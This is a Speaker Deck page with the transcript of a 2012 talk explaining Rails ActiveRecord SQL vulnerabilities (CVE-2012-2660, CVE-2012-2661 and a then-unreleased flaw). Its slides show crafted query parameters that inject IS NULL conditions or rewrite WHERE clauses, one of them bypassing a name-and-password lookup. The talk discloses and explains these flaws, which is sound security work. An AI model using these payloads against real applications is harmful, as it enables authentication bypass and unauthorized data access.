Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

711272a06d435ca5139b50874351cdbf?s=47 Justin Collins
April 23, 2015
Programming
0
47

"Recent Rails SQL Issues" - 2012

711272a06d435ca5139b50874351cdbf?s=128

Justin Collins

April 23, 2015
Tweet

More Decks by Justin Collins

See All by Justin Collins
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
49
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
420
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
84
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
120
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
280
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
240
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
140
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
8
970
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
120

Other Decks in Programming

See All in Programming
404a34d5e0d3d7b38237a8cbecf4c18a?s=48 seiseikai123
0
210
Cf642b7a99e07f86e6e7ec7a3bb94d87?s=48 uemura
1
310
9f2edd3fb2cc8feb20221138ca91d9fc?s=48 kuriko
0
260
461346ac617a22f5bf6346e28d7c7202?s=48 bassbone
0
250
897f2389f9228d4ef123f4196e75f3a4?s=48 yukimasa123
0
140
Ca7e4f1680e175e6462a039923e71fc5?s=48 kyokonishito
0
160
0c217b9a7dd0aa31ed40bd0f453727e1?s=48 ramsey
PRO
1
230
404a34d5e0d3d7b38237a8cbecf4c18a?s=48 seiseikai123
0
920
7fccfb690a818ed2f3a15fc21d426d5a?s=48 texmeijin
1
110
96466365a9bf7e66990f2b9ba547b02f?s=48 yumu19
1
670
20ddbe9b7cfdde5e2dfeb8d8714d5de8?s=48 tarugoconf
0
1.6k
F247cc71d9e0bba9f60709c3ae48dd80?s=48 decoch
1
110

Featured

See All Featured
864a009ac73600c7c02e1f26629dd989?s=48 paigeccino
7
580
170b760e0147792d0140e59ec78e9893?s=48 eitanlees
120
11k
4394ceb8b277f35ee3da7030384efb5d?s=48 davidbonilla
75
3.8k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
446
29k
Ef32e0b1ac5082450dc8c1fca3a26b5c?s=48 cherdarchuk
78
280k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
688
180k
15f2b8221f247985a27a627d2ece72f0?s=48 pauljervisheath
196
16k
Ba530e786553390f3fb271848485681c?s=48 3n
170
23k
E9221b172e78e888355fa2fe4541b595?s=48 mclloyd
7
7.9k
F383c6a4dc55e331bbe2987b622cee6b?s=48 stephaniewalter
267
11k
25c7c18223fb42a4c6ae1c8db6f50f9b?s=48 mojombo
364
63k
B3d6434763caa0ef5dc4b792662c49f7?s=48 smashingmag
237
18k

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x

  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x

  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1